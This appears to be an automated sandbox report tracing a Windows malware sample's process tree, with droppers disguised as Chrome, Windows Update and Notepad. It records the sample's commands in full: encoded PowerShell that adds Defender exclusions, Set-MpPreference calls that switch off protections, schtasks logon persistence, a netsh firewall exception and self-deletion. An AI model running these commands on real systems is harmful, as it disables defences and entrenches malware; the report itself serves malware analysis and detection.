PID 2696 wrote to memory of 416	2696	e11fa56349781d01080d0baba6367758.exe	WINDOWS.EXE
PID 2696 wrote to memory of 416	2696	e11fa56349781d01080d0baba6367758.exe	WINDOWS.EXE
PID 416 wrote to memory of 4072	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 4072	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1632	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1632	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1552	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1552	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2320	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2320	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2928	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2928	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1840	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1840	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 3664	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 3664	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2192	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2192	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 3028	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 3028	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1516	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1516	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 340	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 340	416	WINDOWS.EXE	powershell.exe
PID 584 wrote to memory of 3652	584	WINDOWS UPDATE.EXE	server.exe
PID 584 wrote to memory of 3652	584	WINDOWS UPDATE.EXE	server.exe
PID 584 wrote to memory of 3652	584	WINDOWS UPDATE.EXE	server.exe
PID 416 wrote to memory of 1460	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 1460	416	WINDOWS.EXE	powershell.exe
PID 2624 wrote to memory of 2280	2624	GOOGLE CHROME.EXE	cmd.exe
PID 2624 wrote to memory of 2280	2624	GOOGLE CHROME.EXE	cmd.exe
PID 2624 wrote to memory of 2280	2624	GOOGLE CHROME.EXE	cmd.exe
PID 416 wrote to memory of 2168	416	WINDOWS.EXE	powershell.exe
PID 416 wrote to memory of 2168	416	WINDOWS.EXE	powershell.exe
PID 1368 wrote to memory of 3656	1368	NOTEPAD.EXE	sihost64.exe
PID 1368 wrote to memory of 3656	1368	NOTEPAD.EXE	sihost64.exe
PID 2280 wrote to memory of 4176	2280	cmd.exe	timeout.exe
PID 2280 wrote to memory of 4176	2280	cmd.exe	timeout.exe
PID 2280 wrote to memory of 4176	2280	cmd.exe	timeout.exe
PID 3652 wrote to memory of 4848	3652	server.exe	netsh.exe
PID 3652 wrote to memory of 4848	3652	server.exe	netsh.exe
PID 3652 wrote to memory of 4848	3652	server.exe	netsh.exe
PID 2680 wrote to memory of 4104	2680	CHROME UPDATE.EXE	cmd.exe
PID 2680 wrote to memory of 4104	2680	CHROME UPDATE.EXE	cmd.exe
PID 2760 wrote to memory of 4748	2760	CHROME.EXE	cmd.exe
PID 2760 wrote to memory of 4748	2760	CHROME.EXE	cmd.exe
PID 4104 wrote to memory of 4184	4104	cmd.exe	powershell.exe
PID 4104 wrote to memory of 4184	4104	cmd.exe	powershell.exe
PID 4748 wrote to memory of 4384	4748	cmd.exe	powershell.exe

outlook_office_path 1 IoCs

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	GOOGLE CHROME.EXE

outlook_win_path 1 IoCs

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	GOOGLE CHROME.EXE

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:628

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:564

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:964

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1db1ec0e-2832-44a1-8894-a3e207ab6c5a}
2⤵
PID:1972

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:712

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1668

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1e0
2⤵
PID:2268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1856

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2132

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2508

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Suspicious use of UnmapMainImage
PID:2532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2516

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2612

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2664

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\e11fa56349781d01080d0baba6367758.exe
"C:\Users\Admin\AppData\Local\Temp\e11fa56349781d01080d0baba6367758.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Users\Admin\AppData\Local\Temp\CHROME UPDATE.EXE
"C:\Users\Admin\AppData\Local\Temp\CHROME UPDATE.EXE"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
5⤵
PID:4184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
5⤵
PID:1964

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "servicesupdate" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe"
4⤵
PID:3212

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "servicesupdate" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe"
5⤵
- Creates scheduled task(s)
PID:692

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe"
4⤵
PID:4128

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4472

C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe
C:\Users\Admin\AppData\Roaming\Microsoft\servicesupdate.exe
5⤵
- Executes dropped EXE
PID:1020

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
6⤵
PID:584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
7⤵
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
7⤵
PID:2924

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
6⤵
- Executes dropped EXE
PID:4296

C:\Users\Admin\AppData\Local\Temp\CHROME.EXE
"C:\Users\Admin\AppData\Local\Temp\CHROME.EXE"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2760

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
5⤵
PID:4384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
5⤵
PID:5044

C:\Windows\System32\nslookup.exe
C:\Windows\System32\nslookup.exe
4⤵
- Drops file in Windows directory
PID:1508

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
4⤵
PID:4392

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
5⤵
- Creates scheduled task(s)
PID:4480

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\Microsoft\services.exe"
4⤵
PID:2692

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2444

C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
C:\Users\Admin\AppData\Roaming\Microsoft\services.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4424

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
6⤵
PID:1248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
7⤵
PID:748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
7⤵
PID:808

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
6⤵
- Executes dropped EXE
PID:2360

C:\Windows\System32\nslookup.exe
"C:\Windows\System32\nslookup.exe" "saifcdmtmnvcn"
7⤵
PID:704

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:3920

C:\Windows\System32\nslookup.exe
C:\Windows\System32\nslookup.exe sftvajqyhq0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS5a+kDe4w1mLzYsRI/LuCd6FAArVGer+fGI7AGs5V/i1l3RkntgnURxXlB6//2VjxVCI+Y6C+CXIc06SY0rs6kBeXVFHc2CHK39Mfl0SjCv7idMDtIMYnUkXuL3CDdDxh8N8AmoKBatGiJsH0Rbb52aAJmb4vq3sWUtVan9b4riuhJfhV7s/ssXFVbyBZM7oqx/ZG1guFpT334AoH/LyKl2GU3UlJ+xWa5R9QGSALZ93yai32VNe3EiSxlcjwWccfm4+dDfYIe1/oNXvKQcvYm58w4oha65/CLmmwfV0MRLFUmx7aZywYBY41aLenObWAPiQmf9dzCvLpdIhSZMVhKh2WQMM3g7f6U+DzDbAIQ6KKyVRXQ9i4ep5kcxvRG7GVQSXXvE7U0aRZThxD21wjOx5m07be+XADWn0AVjktWo33v6RYjetPkeb6WXmTp08Oqlj3o88lt8OE0RVizcsjhdCFoi9TI+IockCfmpTYG1sHOnaPjLG0RiVNb+yqvAtXiy8zKnecp7CZuu4b/jiFW8sQelPXB9cVk01Kkb4I1daMatStvVzc0KSVG8mKggxec8XjPfyFNTdwC6YmaLprIY1qtgre6j93Lsp4RvRk08GiA7Z8m7c93+5XI8z6UdPqP50axZPkt4XplOgRZuDsdsULEm5QwCfDQ453GqGAbN1KbMIIsyvIkYTlNPgq06Pz1T5lVNMVXeFpapiDKKOdEjwiidghJqBkx9fGVUUJ5hROYSaHIe3H7XBQ2uA1aylhpGUQf8xpWLy+t1n9yA8YzzS9mX8HkCswg+95bJbWIXuHdgBsFKKgR+r/4nuEK11pTaplR1OK+cnNprdEfTuWu
6⤵
PID:4980

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3584

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4980 -s 240
7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3748

C:\Users\Admin\AppData\Local\Temp\GOOGLE CHROME.EXE
"C:\Users\Admin\AppData\Local\Temp\GOOGLE CHROME.EXE"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:2624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "GOOGLE CHROME.EXE"
4⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
5⤵
- Delays execution with timeout.exe
PID:4176

C:\Users\Admin\AppData\Local\Temp\NOTEPAD.EXE
"C:\Users\Admin\AppData\Local\Temp\NOTEPAD.EXE"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368

C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:3656

C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE
"C:\Users\Admin\AppData\Local\Temp\SVCHOST.EXE"
3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:2836

C:\Users\Admin\AppData\Local\Temp\WINDOWS UPDATE.EXE
"C:\Users\Admin\AppData\Local\Temp\WINDOWS UPDATE.EXE"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:584

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
5⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE
"C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
4⤵
PID:3664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2640

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:2244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1768

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:3952

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
PID:3096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:1848

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3380

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3380 -s 772
2⤵
- Program crash
PID:2584

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3568

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3568 -s 864
2⤵
- Program crash
PID:1012

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3568 -s 844
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:600

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s WinHttpAutoProxySvc
1⤵
PID:1588

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1772

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1712

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1564

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s FontCache
1⤵
PID:1496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
